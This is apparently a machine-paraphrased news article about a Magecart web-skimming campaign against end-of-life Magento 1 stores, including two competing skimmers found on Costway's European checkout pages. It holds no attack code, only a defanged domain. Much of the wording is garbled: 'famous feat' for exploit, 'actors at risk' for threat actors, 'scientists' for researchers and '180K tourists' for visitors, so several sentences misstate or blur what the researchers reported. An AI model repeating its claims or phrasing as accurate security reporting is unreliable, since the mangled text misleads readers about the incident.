Thousands of retailers worldwide on the platform are encouraged to upgrade the mobile version to ‘Magento 2’, as thousands of e-commerce shops were hacked with the credit card skimming code infecting all of them. During the tracking of events related to the ‘Magento 1’ initiative, observably, an e-commerce shop was attacked twice by skimmers. 

In this particular incident, the threat actors devised a copy of their writings that is well-known to places that were already injected by the Magento 1 skimmer. The second skimmer will now actually collect the credit card data from the pre-existing fake form which were previously injected by the actors.

"A large number of Magento 1 sites have been hacked but yet are not necessarily being monetized,” as stated by the researcher at Malwarebytes. He further added that “Other threat actors that want access will undoubtedly attempt to inject their own malicious code. When that happens, we see criminals trying to access the same resources and sometimes fighting with one another.” 

The end-of-life of Magento 1, paired with a famous feat, was an immense blessing for the actors at risk. Many pages were indiscriminately compromised merely because they were weak. RiskIQ has allocated these cases to Magecart Group 12, which uses diverse tactics including chain threats with a long history of web skimming.

On the payment websites of Costway, one of the leading retailers in North America and Europe, two web skimmers have been found selling appliances, furniture, etc. The skimmers seek to provide payment information with consumers' credit card. “Our crawlers identified that the websites for Costway France, U.K., Germany, and Spain, which run the Magento 1 software, had been compromised around the same time frame,” said researchers. 

On the Costway check-out page, the researchers noticed the credit card skimmer injection, which stands out in English while the majority of the platform is in French. This is no surprise considering the automated and very indiscriminate Magento 1 hacking campaign. 

The threat to victims is huge, as scientists claim that just in December 2020, Costway's French portal (Costway[.]fr) received approximately 180K tourists. There is also a second skimmer (loaded from the securityxx[.]top externally) on the web which targets the skimmer of Magento 1. 

Many Magento 1 websites have been compromised, but they are not monetized yet. Additional attacks would certainly continue to inject their own malicious code.